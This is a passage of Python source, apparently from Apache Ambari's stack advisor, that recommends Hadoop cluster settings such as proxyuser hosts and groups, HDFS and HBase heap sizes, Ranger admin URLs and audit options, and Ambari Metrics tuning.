putCoreSitePropertyAttribute):\n if \"HDFS\" in servicesList:\n ambari_user = self.getAmbariUser(services)\n ambariHostName = socket.getfqdn()\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.hosts\".format(ambari_user), ambariHostName)\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.groups\".format(ambari_user), \"*\")\n old_ambari_user = self.getOldAmbariUser(services)\n if old_ambari_user is not None:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.hosts\".format(old_ambari_user), 
'delete', 'true')\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.groups\".format(old_ambari_user), 'delete', 'true')\n\n def recommendHadoopProxyUsers (self, configurations, services, hosts):\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n users = {}\n\n if 'forced-configurations' not in services:\n services[\"forced-configurations\"] = []\n\n if \"HDFS\" in servicesList:\n hdfs_user = None\n if \"hadoop-env\" in services[\"configurations\"] and \"hdfs_user\" in services[\"configurations\"][\"hadoop-env\"][\"properties\"]:\n hdfs_user = services[\"configurations\"][\"hadoop-env\"][\"properties\"][\"hdfs_user\"]\n if not hdfs_user in users and hdfs_user is not None:\n users[hdfs_user] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"hadoop-env\", \"propertyName\" : \"hdfs_user\"}\n\n if \"OOZIE\" in servicesList:\n oozie_user = None\n if \"oozie-env\" in services[\"configurations\"] and \"oozie_user\" in services[\"configurations\"][\"oozie-env\"][\"properties\"]:\n oozie_user = services[\"configurations\"][\"oozie-env\"][\"properties\"][\"oozie_user\"]\n oozieServerrHosts = self.getHostsWithComponent(\"OOZIE\", \"OOZIE_SERVER\", services, hosts)\n if oozieServerrHosts is not None:\n oozieServerHostsNameList = []\n for oozieServerHost in oozieServerrHosts:\n oozieServerHostsNameList.append(oozieServerHost[\"Hosts\"][\"host_name\"])\n oozieServerHostsNames = \",\".join(oozieServerHostsNameList)\n if not oozie_user in users and oozie_user is not None:\n users[oozie_user] = {\"propertyHosts\" : oozieServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"oozie-env\", \"propertyName\" : \"oozie_user\"}\n\n hive_user = None\n if \"HIVE\" in servicesList:\n webhcat_user = None\n if \"hive-env\" in services[\"configurations\"] and \"hive_user\" in services[\"configurations\"][\"hive-env\"][\"properties\"] \\\n and \"webhcat_user\" in services[\"configurations\"][\"hive-env\"][\"properties\"]:\n hive_user = services[\"configurations\"][\"hive-env\"][\"properties\"][\"hive_user\"]\n webhcat_user = services[\"configurations\"][\"hive-env\"][\"properties\"][\"webhcat_user\"]\n hiveServerHosts = self.getHostsWithComponent(\"HIVE\", \"HIVE_SERVER\", services, hosts)\n hiveServerInteractiveHosts = self.getHostsWithComponent(\"HIVE\", \"HIVE_SERVER_INTERACTIVE\", services, hosts)\n webHcatServerHosts = self.getHostsWithComponent(\"HIVE\", \"WEBHCAT_SERVER\", services, hosts)\n\n if hiveServerHosts is not None:\n hiveServerHostsNameList = []\n for hiveServerHost in hiveServerHosts:\n hiveServerHostsNameList.append(hiveServerHost[\"Hosts\"][\"host_name\"])\n # Append Hive Server Interactive host as well, as it is Hive2/HiveServer2 component.\n if hiveServerInteractiveHosts:\n for hiveServerInteractiveHost in hiveServerInteractiveHosts:\n hiveServerInteractiveHostName = hiveServerInteractiveHost[\"Hosts\"][\"host_name\"]\n if hiveServerInteractiveHostName not in hiveServerHostsNameList:\n hiveServerHostsNameList.append(hiveServerInteractiveHostName)\n Logger.info(\"Appended (if not exiting), Hive Server Interactive Host : '{0}', to Hive Server Host List : '{1}'\".format(hiveServerInteractiveHostName, hiveServerHostsNameList))\n\n hiveServerHostsNames = \",\".join(hiveServerHostsNameList) # includes Hive Server interactive host also.\n Logger.info(\"Hive Server and Hive Server Interactive (if enabled) Host List : {0}\".format(hiveServerHostsNameList))\n if not hive_user in users and hive_user is not None:\n 
users[hive_user] = {\"propertyHosts\" : hiveServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"hive-env\", \"propertyName\" : \"hive_user\"}\n\n if webHcatServerHosts is not None:\n webHcatServerHostsNameList = []\n for webHcatServerHost in webHcatServerHosts:\n webHcatServerHostsNameList.append(webHcatServerHost[\"Hosts\"][\"host_name\"])\n webHcatServerHostsNames = \",\".join(webHcatServerHostsNameList)\n if not webhcat_user in users and webhcat_user is not None:\n users[webhcat_user] = {\"propertyHosts\" : webHcatServerHostsNames,\"propertyGroups\" : \"*\", \"config\" : \"hive-env\", \"propertyName\" : \"webhcat_user\"}\n\n if \"YARN\" in servicesList:\n yarn_user = None\n if \"yarn-env\" in services[\"configurations\"] and \"yarn_user\" in services[\"configurations\"][\"yarn-env\"][\"properties\"]:\n yarn_user = services[\"configurations\"][\"yarn-env\"][\"properties\"][\"yarn_user\"]\n rmHosts = self.getHostsWithComponent(\"YARN\", \"RESOURCEMANAGER\", services, hosts)\n\n if len(rmHosts) > 1:\n rmHostsNameList = []\n for rmHost in rmHosts:\n rmHostsNameList.append(rmHost[\"Hosts\"][\"host_name\"])\n rmHostsNames = \",\".join(rmHostsNameList)\n if not yarn_user in users and yarn_user is not None:\n users[yarn_user] = {\"propertyHosts\" : rmHostsNames, \"config\" : \"yarn-env\", \"propertyName\" : \"yarn_user\"}\n\n\n if \"FALCON\" in servicesList:\n falconUser = None\n if \"falcon-env\" in services[\"configurations\"] and \"falcon_user\" in services[\"configurations\"][\"falcon-env\"][\"properties\"]:\n falconUser = services[\"configurations\"][\"falcon-env\"][\"properties\"][\"falcon_user\"]\n if not falconUser in users and falconUser is not None:\n users[falconUser] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"falcon-env\", \"propertyName\" : \"falcon_user\"}\n\n if \"SPARK\" in servicesList:\n livyUser = None\n if \"livy-env\" in services[\"configurations\"] and \"livy_user\" in services[\"configurations\"][\"livy-env\"][\"properties\"]:\n livyUser = services[\"configurations\"][\"livy-env\"][\"properties\"][\"livy_user\"]\n if not livyUser in users and livyUser is not None:\n users[livyUser] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"livy-env\", \"propertyName\" : \"livy_user\"}\n\n if \"SPARK2\" in servicesList:\n livyUser = None\n if \"livy2-env\" in services[\"configurations\"] and \"livy_user\" in services[\"configurations\"][\"livy2-env\"][\"properties\"]:\n livyUser = services[\"configurations\"][\"livy2-env\"][\"properties\"][\"livy_user\"]\n if not livyUser in users and livyUser is not None:\n users[livy2User] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"livy2-env\", \"propertyName\" : \"livy_user\"}\n\n putCoreSiteProperty = self.putProperty(configurations, \"core-site\", services)\n putCoreSitePropertyAttribute = self.putPropertyAttribute(configurations, \"core-site\")\n\n for user_name, user_properties in users.iteritems():\n if hive_user and hive_user == user_name:\n if \"propertyHosts\" in user_properties:\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(hive_user)})\n # Add properties \"hadoop.proxyuser.*.hosts\", \"hadoop.proxyuser.*.groups\" to core-site for all users\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.hosts\".format(user_name) , user_properties[\"propertyHosts\"])\n Logger.info(\"Updated hadoop.proxyuser.{0}.hosts as : {1}\".format(hive_user, user_properties[\"propertyHosts\"]))\n if 
\"propertyGroups\" in user_properties:\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.groups\".format(user_name) , user_properties[\"propertyGroups\"])\n\n # Remove old properties if user was renamed\n userOldValue = getOldValue(self, services, user_properties[\"config\"], user_properties[\"propertyName\"])\n if userOldValue is not None and userOldValue != user_name:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.hosts\".format(userOldValue), 'delete', 'true')\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(userOldValue)})\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(user_name)})\n\n if \"propertyGroups\" in user_properties:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.groups\".format(userOldValue), 'delete', 'true')\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.groups\".format(userOldValue)})\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.groups\".format(user_name)})\n\n self.recommendAmbariProxyUsersForHDFS(services, servicesList, putCoreSiteProperty, putCoreSitePropertyAttribute)\n\n def recommendHDFSConfigurations(self, configurations, clusterData, services, hosts):\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSSiteProperty = self.putProperty(configurations, \"hdfs-site\", services)\n putHDFSSitePropertyAttributes = self.putPropertyAttribute(configurations, \"hdfs-site\")\n putHDFSProperty('namenode_heapsize', max(int(clusterData['totalAvailableRam'] / 2), 1024))\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSProperty('namenode_opt_newsize', max(int(clusterData['totalAvailableRam'] / 8), 128))\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSProperty('namenode_opt_maxnewsize', max(int(clusterData['totalAvailableRam'] / 8), 256))\n\n # Check if NN HA is enabled and recommend removing dfs.namenode.rpc-address\n hdfsSiteProperties = getServicesSiteProperties(services, \"hdfs-site\")\n nameServices = None\n if hdfsSiteProperties and 'dfs.internal.nameservices' in hdfsSiteProperties:\n nameServices = hdfsSiteProperties['dfs.internal.nameservices']\n if nameServices is None and hdfsSiteProperties and 'dfs.nameservices' in hdfsSiteProperties:\n nameServices = hdfsSiteProperties['dfs.nameservices']\n if nameServices and \"dfs.ha.namenodes.%s\" % nameServices in hdfsSiteProperties:\n namenodes = hdfsSiteProperties[\"dfs.ha.namenodes.%s\" % nameServices]\n if len(namenodes.split(',')) > 1:\n putHDFSSitePropertyAttributes(\"dfs.namenode.rpc-address\", \"delete\", \"true\")\n\n #Initialize default 'dfs.datanode.data.dir' if needed\n if (not hdfsSiteProperties) or ('dfs.datanode.data.dir' not in hdfsSiteProperties):\n dataDirs = '/hadoop/hdfs/data'\n putHDFSSiteProperty('dfs.datanode.data.dir', dataDirs)\n else:\n dataDirs = hdfsSiteProperties['dfs.datanode.data.dir'].split(\",\")\n\n # dfs.datanode.du.reserved should be set to 10-15% of volume size\n # For each host selects maximum size of the volume. 
Then gets minimum for all hosts.\n # This ensures that each host will have at least one data dir with available space.\n reservedSizeRecommendation = 0l #kBytes\n for host in hosts[\"items\"]:\n mountPoints = []\n mountPointDiskAvailableSpace = [] #kBytes\n for diskInfo in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(diskInfo[\"mountpoint\"])\n mountPointDiskAvailableSpace.append(long(diskInfo[\"size\"]))\n\n maxFreeVolumeSizeForHost = 0l #kBytes\n for dataDir in dataDirs:\n mp = getMountPointForDir(dataDir, mountPoints)\n for i in range(len(mountPoints)):\n if mp == mountPoints[i]:\n if mountPointDiskAvailableSpace[i] > maxFreeVolumeSizeForHost:\n maxFreeVolumeSizeForHost = mountPointDiskAvailableSpace[i]\n\n if not reservedSizeRecommendation or maxFreeVolumeSizeForHost and maxFreeVolumeSizeForHost < reservedSizeRecommendation:\n reservedSizeRecommendation = maxFreeVolumeSizeForHost\n\n if reservedSizeRecommendation:\n reservedSizeRecommendation = max(reservedSizeRecommendation * 1024 / 8, 1073741824) # At least 1Gb is reserved\n putHDFSSiteProperty('dfs.datanode.du.reserved', reservedSizeRecommendation) #Bytes\n\n # recommendations for \"hadoop.proxyuser.*.hosts\", \"hadoop.proxyuser.*.groups\" properties in core-site\n self.recommendHadoopProxyUsers(configurations, services, hosts)\n\n def recommendHbaseConfigurations(self, configurations, clusterData, services, hosts):\n # recommendations for HBase env config\n\n # If cluster size is < 100, hbase master heap = 2G\n # else If cluster size is < 500, hbase master heap = 4G\n # else hbase master heap = 8G\n # for small test clusters use 1 gb\n hostsCount = 0\n if hosts and \"items\" in hosts:\n hostsCount = len(hosts[\"items\"])\n\n hbaseMasterRam = {\n hostsCount < 20: 1,\n 20 <= hostsCount < 100: 2,\n 100 <= hostsCount < 500: 4,\n 500 <= hostsCount: 8\n }[True]\n\n putHbaseProperty = self.putProperty(configurations, \"hbase-env\", services)\n putHbaseProperty('hbase_regionserver_heapsize', int(clusterData['hbaseRam']) * 1024)\n putHbaseProperty('hbase_master_heapsize', hbaseMasterRam * 1024)\n\n # recommendations for HBase site config\n putHbaseSiteProperty = self.putProperty(configurations, \"hbase-site\", services)\n\n if 'hbase-site' in services['configurations'] and 'hbase.superuser' in services['configurations']['hbase-site']['properties'] \\\n and 'hbase-env' in services['configurations'] and 'hbase_user' in services['configurations']['hbase-env']['properties'] \\\n and services['configurations']['hbase-env']['properties']['hbase_user'] != services['configurations']['hbase-site']['properties']['hbase.superuser']:\n putHbaseSiteProperty(\"hbase.superuser\", services['configurations']['hbase-env']['properties']['hbase_user'])\n\n\n def recommendRangerConfigurations(self, configurations, clusterData, services, hosts):\n\n putRangerAdminProperty = self.putProperty(configurations, \"admin-properties\", services)\n\n # Build policymgr_external_url\n protocol = 'http'\n ranger_admin_host = 'localhost'\n port = '6080'\n\n # Check if http is disabled. 
For HDP-2.3 this can be checked in ranger-admin-site/ranger.service.http.enabled\n # For Ranger-0.4.0 this can be checked in ranger-site/http.enabled\n if ('ranger-site' in services['configurations'] and 'http.enabled' in services['configurations']['ranger-site']['properties'] \\\n and services['configurations']['ranger-site']['properties']['http.enabled'].lower() == 'false') or \\\n ('ranger-admin-site' in services['configurations'] and 'ranger.service.http.enabled' in services['configurations']['ranger-admin-site']['properties'] \\\n and services['configurations']['ranger-admin-site']['properties']['ranger.service.http.enabled'].lower() == 'false'):\n # HTTPS protocol is used\n protocol = 'https'\n # Starting Ranger-0.5.0.2.3 port stored in ranger-admin-site ranger.service.https.port\n if 'ranger-admin-site' in services['configurations'] and \\\n 'ranger.service.https.port' in services['configurations']['ranger-admin-site']['properties']:\n port = services['configurations']['ranger-admin-site']['properties']['ranger.service.https.port']\n # In Ranger-0.4.0 port stored in ranger-site https.service.port\n elif 'ranger-site' in services['configurations'] and \\\n 'https.service.port' in services['configurations']['ranger-site']['properties']:\n port = services['configurations']['ranger-site']['properties']['https.service.port']\n else:\n # HTTP protocol is used\n # Starting Ranger-0.5.0.2.3 port stored in ranger-admin-site ranger.service.http.port\n if 'ranger-admin-site' in services['configurations'] and \\\n 'ranger.service.http.port' in services['configurations']['ranger-admin-site']['properties']:\n port = services['configurations']['ranger-admin-site']['properties']['ranger.service.http.port']\n # In Ranger-0.4.0 port stored in ranger-site http.service.port\n elif 'ranger-site' in services['configurations'] and \\\n 'http.service.port' in services['configurations']['ranger-site']['properties']:\n port = services['configurations']['ranger-site']['properties']['http.service.port']\n\n ranger_admin_hosts = self.getComponentHostNames(services, \"RANGER\", \"RANGER_ADMIN\")\n if ranger_admin_hosts:\n if len(ranger_admin_hosts) > 1 \\\n and services['configurations'] \\\n and 'admin-properties' in services['configurations'] and 'policymgr_external_url' in services['configurations']['admin-properties']['properties'] \\\n and services['configurations']['admin-properties']['properties']['policymgr_external_url'] \\\n and services['configurations']['admin-properties']['properties']['policymgr_external_url'].strip():\n\n # in case of HA deployment keep the policymgr_external_url specified in the config\n policymgr_external_url = services['configurations']['admin-properties']['properties']['policymgr_external_url']\n else:\n\n ranger_admin_host = ranger_admin_hosts[0]\n policymgr_external_url = \"%s://%s:%s\" % (protocol, ranger_admin_host, port)\n\n putRangerAdminProperty('policymgr_external_url', policymgr_external_url)\n\n rangerServiceVersion = [service['StackServices']['service_version'] for service in services[\"services\"] if service['StackServices']['service_name'] == 'RANGER'][0]\n if rangerServiceVersion == '0.4.0':\n # Recommend ldap settings based on ambari.properties configuration\n # If 'ambari.ldap.isConfigured' == true\n # For Ranger version 0.4.0\n if 'ambari-server-properties' in services and \\\n 'ambari.ldap.isConfigured' in services['ambari-server-properties'] and \\\n services['ambari-server-properties']['ambari.ldap.isConfigured'].lower() == \"true\":\n putUserSyncProperty = 
self.putProperty(configurations, \"usersync-properties\", services)\n serverProperties = services['ambari-server-properties']\n if 'authentication.ldap.managerDn' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_BIND_DN', serverProperties['authentication.ldap.managerDn'])\n if 'authentication.ldap.primaryUrl' in serverProperties:\n ldap_protocol = 'ldap://'\n if 'authentication.ldap.useSSL' in serverProperties and serverProperties['authentication.ldap.useSSL'] == 'true':\n ldap_protocol = 'ldaps://'\n ldapUrl = ldap_protocol + serverProperties['authentication.ldap.primaryUrl'] if serverProperties['authentication.ldap.primaryUrl'] else serverProperties['authentication.ldap.primaryUrl']\n putUserSyncProperty('SYNC_LDAP_URL', ldapUrl)\n if 'authentication.ldap.userObjectClass' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_USER_OBJECT_CLASS', serverProperties['authentication.ldap.userObjectClass'])\n if 'authentication.ldap.usernameAttribute' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_USER_NAME_ATTRIBUTE', serverProperties['authentication.ldap.usernameAttribute'])\n\n\n # Set Ranger Admin Authentication method\n if 'admin-properties' in services['configurations'] and 'usersync-properties' in services['configurations'] and \\\n 'SYNC_SOURCE' in services['configurations']['usersync-properties']['properties']:\n rangerUserSyncSource = services['configurations']['usersync-properties']['properties']['SYNC_SOURCE']\n authenticationMethod = rangerUserSyncSource.upper()\n if authenticationMethod != 'FILE':\n putRangerAdminProperty('authentication_method', authenticationMethod)\n\n # Recommend xasecure.audit.destination.hdfs.dir\n # For Ranger version 0.4.0\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n putRangerEnvProperty = self.putProperty(configurations, \"ranger-env\", services)\n include_hdfs = \"HDFS\" in servicesList\n if include_hdfs:\n if 'core-site' in services['configurations'] and ('fs.defaultFS' in services['configurations']['core-site']['properties']):\n default_fs = services['configurations']['core-site']['properties']['fs.defaultFS']\n default_fs += '/ranger/audit/%app-type%/%time:yyyyMMdd%'\n putRangerEnvProperty('xasecure.audit.destination.hdfs.dir', default_fs)\n\n # Recommend Ranger Audit properties for ranger supported services\n # For Ranger version 0.4.0\n ranger_services = [\n {'service_name': 'HDFS', 'audit_file': 'ranger-hdfs-plugin-properties'},\n {'service_name': 'HBASE', 'audit_file': 'ranger-hbase-plugin-properties'},\n {'service_name': 'HIVE', 'audit_file': 'ranger-hive-plugin-properties'},\n {'service_name': 'KNOX', 'audit_file': 'ranger-knox-plugin-properties'},\n {'service_name': 'STORM', 'audit_file': 'ranger-storm-plugin-properties'}\n ]\n\n for item in range(len(ranger_services)):\n if ranger_services[item]['service_name'] in servicesList:\n component_audit_file = ranger_services[item]['audit_file']\n if component_audit_file in services[\"configurations\"]:\n ranger_audit_dict = [\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.db', 'target_configname': 'XAAUDIT.DB.IS_ENABLED'},\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.hdfs', 'target_configname': 'XAAUDIT.HDFS.IS_ENABLED'},\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.hdfs.dir', 'target_configname': 'XAAUDIT.HDFS.DESTINATION_DIRECTORY'}\n ]\n putRangerAuditProperty = self.putProperty(configurations, component_audit_file, services)\n\n for item in 
ranger_audit_dict:\n if item['filename'] in services[\"configurations\"] and item['configname'] in services[\"configurations\"][item['filename']][\"properties\"]:\n if item['filename'] in configurations and item['configname'] in configurations[item['filename']][\"properties\"]:\n rangerAuditProperty = configurations[item['filename']][\"properties\"][item['configname']]\n else:\n rangerAuditProperty = services[\"configurations\"][item['filename']][\"properties\"][item['configname']]\n putRangerAuditProperty(item['target_configname'], rangerAuditProperty)\n\n\n def getAmsMemoryRecommendation(self, services, hosts):\n # MB per sink in hbase heapsize\n HEAP_PER_MASTER_COMPONENT = 50\n HEAP_PER_SLAVE_COMPONENT = 10\n\n schMemoryMap = {\n \"HDFS\": {\n \"NAMENODE\": HEAP_PER_MASTER_COMPONENT,\n \"DATANODE\": HEAP_PER_SLAVE_COMPONENT\n },\n \"YARN\": {\n \"RESOURCEMANAGER\": HEAP_PER_MASTER_COMPONENT,\n },\n \"HBASE\": {\n \"HBASE_MASTER\": HEAP_PER_MASTER_COMPONENT,\n \"HBASE_REGIONSERVER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"ACCUMULO\": {\n \"ACCUMULO_MASTER\": HEAP_PER_MASTER_COMPONENT,\n \"ACCUMULO_TSERVER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"KAFKA\": {\n \"KAFKA_BROKER\": HEAP_PER_MASTER_COMPONENT\n },\n \"FLUME\": {\n \"FLUME_HANDLER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"STORM\": {\n \"NIMBUS\": HEAP_PER_MASTER_COMPONENT,\n },\n \"AMBARI_METRICS\": {\n \"METRICS_COLLECTOR\": HEAP_PER_MASTER_COMPONENT,\n \"METRICS_MONITOR\": HEAP_PER_SLAVE_COMPONENT\n }\n }\n total_sinks_count = 0\n # minimum heap size\n hbase_heapsize = 500\n for serviceName, componentsDict in schMemoryMap.items():\n for componentName, multiplier in componentsDict.items():\n schCount = len(\n self.getHostsWithComponent(serviceName, componentName, services,\n hosts))\n hbase_heapsize += int((schCount * multiplier) ** 0.9)\n total_sinks_count += schCount\n collector_heapsize = int(hbase_heapsize/4 if hbase_heapsize > 2048 else 512)\n\n return round_to_n(collector_heapsize), round_to_n(hbase_heapsize), total_sinks_count\n\n def recommendStormConfigurations(self, configurations, clusterData, services, hosts):\n putStormSiteProperty = self.putProperty(configurations, \"storm-site\", services)\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n # Storm AMS integration\n if 'AMBARI_METRICS' in servicesList:\n putStormSiteProperty('metrics.reporter.register', 'org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter')\n\n def recommendAmsConfigurations(self, configurations, clusterData, services, hosts):\n putAmsEnvProperty = self.putProperty(configurations, \"ams-env\", services)\n putAmsHbaseSiteProperty = self.putProperty(configurations, \"ams-hbase-site\", services)\n putAmsSiteProperty = self.putProperty(configurations, \"ams-site\", services)\n putHbaseEnvProperty = self.putProperty(configurations, \"ams-hbase-env\", services)\n putGrafanaProperty = self.putProperty(configurations, \"ams-grafana-env\", services)\n putGrafanaPropertyAttribute = self.putPropertyAttribute(configurations, \"ams-grafana-env\")\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n\n if 'cluster-env' in services['configurations'] and \\\n 'metrics_collector_vip_host' in services['configurations']['cluster-env']['properties']:\n metric_collector_host = services['configurations']['cluster-env']['properties']['metrics_collector_vip_host']\n else:\n metric_collector_host = 'localhost' if len(amsCollectorHosts) == 0 else 
amsCollectorHosts[0]\n\n putAmsSiteProperty(\"timeline.metrics.service.webapp.address\", str(metric_collector_host) + \":6188\")\n\n log_dir = \"/var/log/ambari-metrics-collector\"\n if \"ams-env\" in services[\"configurations\"]:\n if \"metrics_collector_log_dir\" in services[\"configurations\"][\"ams-env\"][\"properties\"]:\n log_dir = services[\"configurations\"][\"ams-env\"][\"properties\"][\"metrics_collector_log_dir\"]\n putHbaseEnvProperty(\"hbase_log_dir\", log_dir)\n\n defaultFs = 'file:///'\n if \"core-site\" in services[\"configurations\"] and \\\n \"fs.defaultFS\" in services[\"configurations\"][\"core-site\"][\"properties\"]:\n defaultFs = services[\"configurations\"][\"core-site\"][\"properties\"][\"fs.defaultFS\"]\n\n operatingMode = \"embedded\"\n if \"ams-site\" in services[\"configurations\"]:\n if \"timeline.metrics.service.operation.mode\" in services[\"configurations\"][\"ams-site\"][\"properties\"]:\n operatingMode = services[\"configurations\"][\"ams-site\"][\"properties\"][\"timeline.metrics.service.operation.mode\"]\n\n if operatingMode == \"distributed\":\n putAmsSiteProperty(\"timeline.metrics.service.watcher.disabled\", 'true')\n putAmsHbaseSiteProperty(\"hbase.cluster.distributed\", 'true')\n else:\n putAmsSiteProperty(\"timeline.metrics.service.watcher.disabled\", 'false')\n putAmsHbaseSiteProperty(\"hbase.cluster.distributed\", 'false')\n\n rootDir = \"file:///var/lib/ambari-metrics-collector/hbase\"\n tmpDir = \"/var/lib/ambari-metrics-collector/hbase-tmp\"\n zk_port_default = []\n if \"ams-hbase-site\" in services[\"configurations\"]:\n if \"hbase.rootdir\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n rootDir = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.rootdir\"]\n if \"hbase.tmp.dir\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n tmpDir = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.tmp.dir\"]\n if \"hbase.zookeeper.property.clientPort\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n zk_port_default = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.zookeeper.property.clientPort\"]\n\n # Skip recommendation item if default value is present\n if operatingMode == \"distributed\" and not \"{{zookeeper_clientPort}}\" in zk_port_default:\n zkPort = self.getZKPort(services)\n putAmsHbaseSiteProperty(\"hbase.zookeeper.property.clientPort\", zkPort)\n elif operatingMode == \"embedded\" and not \"{{zookeeper_clientPort}}\" in zk_port_default:\n putAmsHbaseSiteProperty(\"hbase.zookeeper.property.clientPort\", \"61181\")\n\n mountpoints = [\"/\"]\n for collectorHostName in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n mountpoints = self.getPreferredMountPoints(host[\"Hosts\"])\n break\n isLocalRootDir = rootDir.startswith(\"file://\") or (defaultFs.startswith(\"file://\") and rootDir.startswith(\"/\"))\n if isLocalRootDir:\n rootDir = re.sub(\"^file:///|/\", \"\", rootDir, count=1)\n rootDir = \"file://\" + os.path.join(mountpoints[0], rootDir)\n tmpDir = re.sub(\"^file:///|/\", \"\", tmpDir, count=1)\n if len(mountpoints) > 1 and isLocalRootDir:\n tmpDir = os.path.join(mountpoints[1], tmpDir)\n else:\n tmpDir = os.path.join(mountpoints[0], tmpDir)\n putAmsHbaseSiteProperty(\"hbase.tmp.dir\", tmpDir)\n\n if operatingMode == \"distributed\":\n putAmsHbaseSiteProperty(\"hbase.rootdir\", defaultFs + \"/user/ams/hbase\")\n\n if operatingMode == 
\"embedded\":\n if isLocalRootDir:\n putAmsHbaseSiteProperty(\"hbase.rootdir\", rootDir)\n else:\n putAmsHbaseSiteProperty(\"hbase.rootdir\", \"file:///var/lib/ambari-metrics-collector/hbase\")\n\n collector_heapsize, hbase_heapsize, total_sinks_count = self.getAmsMemoryRecommendation(services, hosts)\n\n putAmsEnvProperty(\"metrics_collector_heapsize\", collector_heapsize)\n\n # blockCache = 0.3, memstore = 0.35, phoenix-server = 0.15, phoenix-client = 0.25\n putAmsHbaseSiteProperty(\"hfile.block.cache.size\", 0.3)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.upperLimit\", 0.35)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.lowerLimit\", 0.3)\n\n if len(amsCollectorHosts) > 1:\n pass\n else:\n # blockCache = 0.3, memstore = 0.3, phoenix-server = 0.2, phoenix-client = 0.3\n if total_sinks_count >= 2000:\n putAmsHbaseSiteProperty(\"hbase.regionserver.handler.count\", 60)\n putAmsHbaseSiteProperty(\"hbase.regionserver.hlog.blocksize\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.maxlogs\", 64)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 268435456)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.upperLimit\", 0.3)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.lowerLimit\", 0.25)\n putAmsHbaseSiteProperty(\"phoenix.query.maxGlobalMemoryPercentage\", 20)\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 81920000)\n putAmsSiteProperty(\"phoenix.query.maxGlobalMemoryPercentage\", 30)\n putAmsSiteProperty(\"timeline.metrics.service.resultset.fetchSize\", 10000)\n elif total_sinks_count >= 500:\n putAmsHbaseSiteProperty(\"hbase.regionserver.handler.count\", 60)\n putAmsHbaseSiteProperty(\"hbase.regionserver.hlog.blocksize\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.maxlogs\", 64)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 268435456)\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 40960000)\n putAmsSiteProperty(\"timeline.metrics.service.resultset.fetchSize\", 5000)\n else:\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 20480000)\n pass\n\n metrics_api_handlers = min(50, max(20, int(total_sinks_count / 100)))\n putAmsSiteProperty(\"timeline.metrics.service.handler.thread.count\", metrics_api_handlers)\n\n # Distributed mode heap size\n if operatingMode == \"distributed\":\n hbase_heapsize = max(hbase_heapsize, 768)\n putHbaseEnvProperty(\"hbase_master_heapsize\", \"512\")\n putHbaseEnvProperty(\"hbase_master_xmn_size\", \"102\") #20% of 512 heap size\n putHbaseEnvProperty(\"hbase_regionserver_heapsize\", hbase_heapsize)\n putHbaseEnvProperty(\"regionserver_xmn_size\", round_to_n(0.15*hbase_heapsize,64))\n else:\n # Embedded mode heap size : master + regionserver\n hbase_rs_heapsize = 768\n putHbaseEnvProperty(\"hbase_regionserver_heapsize\", 